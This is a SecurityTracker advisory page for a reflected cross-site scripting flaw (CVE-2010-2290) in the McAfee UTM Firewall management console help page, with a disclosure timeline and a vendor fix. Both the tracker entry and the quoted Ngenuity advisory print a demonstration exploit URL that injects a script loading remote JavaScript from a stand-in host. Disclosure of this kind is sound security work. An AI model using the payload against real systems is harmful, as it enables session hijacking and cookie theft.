SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service
Report a Bug
Report a vulnerability that you have found to SecurityTracker
bugs
@
securitytracker.com






Category:   Device (Firewall)  >   McAfee UTM Firewall Vendors:   McAfee
McAfee UTM Firewall Input Validation Flaw in Help Page Permits Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1024091
SecurityTracker URL:  http://securitytracker.com/id/1024091
CVE Reference:   CVE-2010-2290   (Links to External Site)
Updated:  Jun 18 2010
Original Entry Date:  Jun 11 2010
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  
Version(s): 3.0.0 to 4.0.6
Description:   A vulnerability was reported in McAfee UTM Firewall. A remote user can conduct cross-site scripting attacks.

The management console help feature does not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by an authenticated target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the McAfee UTM Firewall device and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The remote user must know the internal IP address for the target UTM device.

A demonstration exploit URL is provided:

http://[target]/cgi-bin/cgix/help?&page=web_list_block“><script
src=“http://example.com/xss.js”></script>

The vendor was notified on January 21, 2010.

The original advisory is available at:

http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/

Adam Baldwin of Ngenuity Information Services reported this vulnerability.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the McAfee UTM Firewall device, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor has issued a fix (4.0.7).

The vendor's advisory is available at:

https://kc.mcafee.com/corporate/index?page=content&id=SB10010

Vendor URL:  kc.mcafee.com/corporate/index?page=content&id=SB10010 (Links to External Site)
Cause:   Input validation error
Underlying OS:  

Message History:   None.


 Source Message Contents

Date:  Wed, 09 Jun 2010 13:26:34 -0700
Subject:  McAfee UTM Firewall Help Reflected Cross-Site Scripting


      Advisory Information

Advisory ID: NGENUITY-2010-005

Date published: 6/9/2010


      Vulnerability Information

Class: Reflected Cross-Site Scripting (XSS)


      Software Description

McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6) (formerly SnapGear) is the
affected product line. More information can be found at
https://kc.mcafee.com/corporate/index?page=content&id=SB10010
<http://www.mcafee.com/us/enterprise/products/network_security/utm_firewall.html>


      Vulnerability Description

The help feature of the McAfee UTM Firewall (Firmware 3.0.0 to 4.0.6)
management console is vulnerable to reflected cross-site scripting.

It could allow an attacker to cause a user to execute attacker-supplied
Javascript code. This attack requires the target to have an existing
valid session logged into the UTM device and that the attacker know the
internal IP address for the UTM device.

McAfee recommends upgrading to UTM Firewall Firmware 4.0.7 to mitigate
this vulnerability

*Timeline:
*

1/21/2010 - McAfee notified of vulnerability, provided with proof of concept
6/9/2010 - McAfee notified nGenuity of available fix and related information


      Technical Description

*Example Exploit URL:
*

hxxp://192.168.0.1/cgi-bin/cgix/help?&page=web_list_block“><script
src=“http://example.com/xss.js”></script>

Original Posting:
http://ngenuity-is.com/advisories/2010/jun/9/mcafee-utm-firewall-help-cross-site-scripting/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

Copyright 2014, SecurityGlobal.net LLC